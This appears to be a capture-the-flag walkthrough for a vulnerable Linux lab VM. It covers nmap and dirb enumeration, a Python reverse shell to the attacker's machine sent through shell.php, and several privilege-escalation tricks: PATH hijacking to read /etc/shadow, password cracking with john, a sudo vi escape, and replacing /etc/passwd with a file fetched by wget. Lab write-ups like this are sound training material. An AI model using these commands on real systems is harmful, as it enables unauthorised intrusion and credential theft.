Enumeration
nmap
nmap -sC -sV -oA nmap/EsLinux 192.168.1.114
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-20 06:58 EDT
Nmap scan report for 192.168.1.114
Host is up (0.00014s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 42718/udp6 mountd
| 100005 1,2,3 51050/udp mountd
| 100005 1,2,3 53745/tcp6 mountd
| 100005 1,2,3 59791/tcp mountd
| 100021 1,3,4 33361/tcp6 nlockmgr
| 100021 1,3,4 38815/tcp nlockmgr
| 100021 1,3,4 43707/udp nlockmgr
| 100021 1,3,4 57591/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 3 (RPC #100227)
MAC Address: 00:0C:29:2C:24:CB (VMware)
Service Info: Host: LINUX
Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: osboxes
| NetBIOS computer name: LINUX\x00
| Domain name: \x00
| FQDN: osboxes
|_ System time: 2020-05-20T06:58:42-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-20T10:58:42
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.82 seconds
dirb
dirb http://192.168.1.114/ -X .php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu May 21 23:26:47 2020
URL_BASE: http://192.168.1.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.114/ ----
+ http://192.168.1.114/shell.php (CODE:200|SIZE:29)
-----------------
END_TIME: Thu May 21 23:26:52 2020
DOWNLOADED: 4612 - FOUND: 1
We can see here we have the shell.php, let's put it in the browser
we pass in the cmd and we can get a response from it
Reverse shell
We then can set up a listener at our machine by
At the shell, we can use python to get a reverse shell from it
192.168.1.114/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Got a shell and type
python -c 'import pty; pty.spawn("/bin/bash")'
Then we can start to perform Privilege Escalation.
Privilege Escalation
Method 1
We can escalate the privilege by exploiting the SUID rights of some shell file
type
find / -perm -u=s -type f 2>/dev/null
We can see there are 2 script files running. We first went to the user3 directory
We can see that a script file can be run to get root by any users. Type ./shell
Got root ! Easy !
Method 2
We can get a root shell by cracking the password.
Navigate to user5 directory and we can see the script file, after we run the file it returns list of directory indicates it is running the ls command
Navigate to /tmp
Then type
echo "cat /etc/shadow" > ls
chmod 777 ls
export PATH=/tmp:$PATH
Run the script, then we will get this
Copy the hash to a file and crack with john
We can see that we got the username root and password with 12345.
su into root and you will get root lmao.
Method 3
We know that user5 script can execute with root, so we can use echo and chpasswd to replace the existing password.
By doing that, navigate back to /tmp and type echo 'echo "user1:12345" | chpasswd" > ls , then chmod777 ls and export the path like we did just now
Then go back to user5 and run the script. Now we can su to user1 and type the password we replace just now which is 12345
Now we got into user1, type sudo -l
Then we can see it has sudo rights to run anything, we can go ahead and type sudo su to get
Method 4
Method 5
Using the PATH variable method at method 3, we can do the same for user8
After that login into user8 and type sudo -l
As we can see we have vi has sudo rights
sudo vi -c ':!/bin/sh' /dev/null
Then we will get root!
Method 6
If we type cat /etc/passwd , we got this and we can see user7 GID has root access
We can use the PATH variable that we use on user7
We can first copy the whole passwd to out machine then add a credentials.
But first we need to create a passwd for our new user, type
openssl passwd -1 -salt <salt> <password>
For example
openssl passwd -1 -salt wow damn
After that our machine we can add in the credentials like that
then create a SimpleHTTPServer using python by typing
python -m SimpleHTTPServer
At the target machine, navigate to /etc directory and type
wget -O passwd 192.168.1.113:8000/passwd
Then the transfer is successful, we can then su to the newly created credentials and type in the password we created.
Got root !
